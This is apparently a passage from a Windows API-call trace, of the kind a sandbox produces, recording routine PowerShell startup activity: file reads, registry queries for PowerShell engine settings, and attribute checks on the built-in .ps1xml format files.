	[0445.225] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.225] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.225] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.225] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.226] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.227] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.227] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.227] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.227] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.228] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.228] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.228] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.228] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.229] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.229] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.229] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.229] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.230] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.230] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.230] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.230] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.232] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.232] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.233] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.233] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.233] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.233] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.234] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.234] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.234] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1b4, lpOverlapped=0x0) returned 1
	[0445.234] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x0, lpOverlapped=0x0) returned 1
	[0445.234] CloseHandle (hObject=0x328) returned 1
	[0445.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0445.235] SetErrorMode (uMode=0x1) returned 0x1
	[0445.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d4e0 | out: lpFileInformation=0x12d4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0445.235] SetErrorMode (uMode=0x1) returned 0x1
	[0445.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0445.235] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5c8 | out: phkResult=0x12d5c8*=0x328) returned 0x0
	[0445.235] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d54c, lpData=0x0, lpcbData=0x12d548*=0x0 | out: lpType=0x12d54c*=0x1, lpData=0x0, lpcbData=0x12d548*=0x56) returned 0x0
	[0445.235] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d1dc0
	[0445.235] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d51c, lpData=0x1b7d1dc0, lpcbData=0x12d518*=0x56 | out: lpType=0x12d51c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d518*=0x56) returned 0x0
	[0445.235] CoTaskMemFree (pv=0x1b7d1dc0) 
	[0445.235] RegCloseKey (hKey=0x328) returned 0x0
	[0445.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0445.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0445.354] VirtualQuery (in: lpAddress=0x12c2b0, lpBuffer=0x12d170, dwLength=0x30 | out: lpBuffer=0x12d170*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.365] VirtualQuery (in: lpAddress=0x12c2b0, lpBuffer=0x12d170, dwLength=0x30 | out: lpBuffer=0x12d170*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.391] VirtualQuery (in: lpAddress=0x12c2b0, lpBuffer=0x12d170, dwLength=0x30 | out: lpBuffer=0x12d170*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.400] VirtualQuery (in: lpAddress=0x12c2b0, lpBuffer=0x12d170, dwLength=0x30 | out: lpBuffer=0x12d170*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.401] VirtualQuery (in: lpAddress=0x12c2b0, lpBuffer=0x12d170, dwLength=0x30 | out: lpBuffer=0x12d170*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.459] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0445.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0445.459] CoTaskMemFree (pv=0x2eadc0) 
	[0445.476] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d768 | out: phkResult=0x12d768*=0x328) returned 0x0
	[0445.476] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x12d77c, lpData=0x0, lpcbData=0x12d778*=0x0 | out: lpType=0x12d77c*=0x1, lpData=0x0, lpcbData=0x12d778*=0x74) returned 0x0
	[0445.476] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x12d6ec, lpData=0x0, lpcbData=0x12d6e8*=0x0 | out: lpType=0x12d6ec*=0x1, lpData=0x0, lpcbData=0x12d6e8*=0x74) returned 0x0
	[0445.476] CoTaskMemAlloc (cb=0x78) returned 0x33f830
	[0445.476] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x12d6bc, lpData=0x33f830, lpcbData=0x12d6b8*=0x74 | out: lpType=0x12d6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d6b8*=0x74) returned 0x0
	[0445.476] CoTaskMemFree (pv=0x33f830) 
	[0445.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0445.476] SetErrorMode (uMode=0x1) returned 0x1
	[0445.476] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0445.477] SetErrorMode (uMode=0x1) returned 0x1
	[0445.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.478] SetErrorMode (uMode=0x1) returned 0x1
	[0445.478] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0445.478] SetErrorMode (uMode=0x1) returned 0x1
	[0445.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0445.478] SetErrorMode (uMode=0x1) returned 0x1
	[0445.478] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0445.479] SetErrorMode (uMode=0x1) returned 0x1
	[0445.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.479] SetErrorMode (uMode=0x1) returned 0x1
	[0445.479] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0445.479] SetErrorMode (uMode=0x1) returned 0x1
	[0445.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.479] SetErrorMode (uMode=0x1) returned 0x1
	[0445.479] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0445.479] SetErrorMode (uMode=0x1) returned 0x1
	[0445.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0445.479] SetErrorMode (uMode=0x1) returned 0x1
	[0445.479] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0445.480] SetErrorMode (uMode=0x1) returned 0x1
	[0445.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0445.480] SetErrorMode (uMode=0x1) returned 0x1
	[0445.480] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0445.480] SetErrorMode (uMode=0x1) returned 0x1
	[0445.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0445.480] SetErrorMode (uMode=0x1) returned 0x1
	[0445.480] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0445.480] SetErrorMode (uMode=0x1) returned 0x1
	[0445.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0445.481] SetErrorMode (uMode=0x1) returned 0x1
	[0445.481] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0445.481] SetErrorMode (uMode=0x1) returned 0x1
	[0445.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0445.481] SetErrorMode (uMode=0x1) returned 0x1
	[0445.481] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d640 | out: lpFileInformation=0x12d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0445.481] SetErrorMode (uMode=0x1) returned 0x1
	[0445.485] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0445.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0445.485] CoTaskMemFree (pv=0x2eadc0) 
	[0445.489] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0445.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0445.489] CoTaskMemFree (pv=0x2eadc0) 
	[0445.490] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0445.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0445.490] CoTaskMemFree (pv=0x2eadc0) 
	[0445.490] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0445.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0445.490] CoTaskMemFree (pv=0x2eadc0) 
	[0445.491] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0445.491] GetFileType (hFile=0x2fc) returned 0x1
	[0445.491] SetErrorMode (uMode=0x1) returned 0x1
	[0445.491] GetFileType (hFile=0x2fc) returned 0x1
	[0445.491] ReadFile (in: hFile=0x2fc, lpBuffer=0x33c05c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x33c05c0*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
